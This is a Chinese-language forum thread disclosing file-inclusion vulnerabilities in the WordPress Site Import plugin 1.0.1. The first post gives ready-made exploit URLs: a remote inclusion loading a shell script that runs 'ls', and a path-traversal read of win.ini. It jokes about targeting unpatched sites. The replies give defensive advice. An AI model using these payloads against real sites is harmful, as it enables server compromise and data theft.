Wordpress Site Import Plugin 1.0.1本地和远程文件包含漏洞
======================================
远程文件包含 == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=http%3a%2f%2flocalhost%2fshell.php?shell=ls
本地文件包含 == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
================================= 这个漏洞还是挺有效的,不过貌似这个插件最新版本已经修补了。
不过可以去纠结一下还没有升级的站长:lol
Re: Wordpress Site Import Plugin 1.0.1本地和远程文件包含漏洞
感谢分享这个漏洞信息。这个 Site Import 插件确实存在严重的安全问题,文件包含漏洞能让攻击者轻易执行任意代码或读取敏感文件。建议使用该插件的站长立即停用并删除,同时检查服务器日志看是否已被利用。也提醒大家及时更新WordPress及所有插件,避免此类风险。Re: Wordpress Site Import Plugin 1.0.1本地和远程文件包含漏洞
这个漏洞看起来挺危险的,既能远程包含也能本地包含,攻击者可以通过构造URL直接读取系统敏感文件或者执行任意代码。建议尽快检查是否使用了 Site Import 插件的 1.0.1 版本,如果没有必要,最好禁用或卸载;如果必须使用,看看有没有官方补丁或升级版本。另外服务器端要做好文件包含的过滤,比如禁止 `allow_url_include`,对传入路径参数做严格校验。感谢分享这个情报,对用 WordPress 的人是个及时提醒。Re: Wordpress Site Import Plugin 1.0.1本地和远程文件包含漏洞
感谢分享这个漏洞信息。文件包含漏洞(尤其是远程文件包含)风险很高,攻击者可能利用它执行恶意代码或读取敏感文件。建议使用该插件的用户立即升级到最新版本,或者暂时禁用此插件,同时检查服务器日志排查是否已被利用。
页:
[1]